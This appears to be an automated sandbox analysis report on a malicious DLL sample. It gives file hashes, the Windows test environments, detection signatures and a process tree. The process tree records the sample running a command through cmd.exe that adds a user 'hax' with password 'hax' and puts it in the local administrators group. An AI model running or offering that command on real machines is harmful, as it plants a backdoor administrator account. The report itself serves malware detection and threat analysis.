Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12-02-2024 03:34
Static task
static1
Behavioral task
behavioral1
Sample
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
Resource
win10v2004-20231215-en
General
-
Target
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
-
Size
523KB
-
MD5
4343b9f0e1e7c48438540363710bb73d
-
SHA1
83407f59bc3e32b25405675c4b05b2e7f8156421
-
SHA256
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056
-
SHA512
6a7222b8741682d8d6bab5c28225f26f985944eab0657a0eb07eb4d75d395554d8b859c11030440aaf7829e9ce14f03cbc62d09a350a424bc604ab70b3a08c40
-
SSDEEP
6144:vif0g6k/mf3vpjfUnvCstwmeiUJ5s/yna2i35PFJF/h7yQ6:vK0gjmf3xfU6suxjTs/QbitX/
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1700 wrote to memory of 2356 1700 rundll32.exe 28 PID 1700 wrote to memory of 2356 1700 rundll32.exe 28 PID 1700 wrote to memory of 2356 1700 rundll32.exe 28 PID 2356 wrote to memory of 1060 2356 cmd.exe 30 PID 2356 wrote to memory of 1060 2356 cmd.exe 30 PID 2356 wrote to memory of 1060 2356 cmd.exe 30 PID 1060 wrote to memory of 2648 1060 net.exe 31 PID 1060 wrote to memory of 2648 1060 net.exe 31 PID 1060 wrote to memory of 2648 1060 net.exe 31 PID 2356 wrote to memory of 1272 2356 cmd.exe 32 PID 2356 wrote to memory of 1272 2356 cmd.exe 32 PID 2356 wrote to memory of 1272 2356 cmd.exe 32 PID 1272 wrote to memory of 2700 1272 net.exe 33 PID 1272 wrote to memory of 2700 1272 net.exe 33 PID 1272 wrote to memory of 2700 1272 net.exe 33
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\cmd.exe/K net user /add hax hax && net localgroup administrators hax /add2⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\net.exenet user /add hax hax3⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add hax hax4⤵PID:2648
-
-
-
C:\Windows\system32\net.exenet localgroup administrators hax /add3⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators hax /add4⤵PID:2700
-
-
-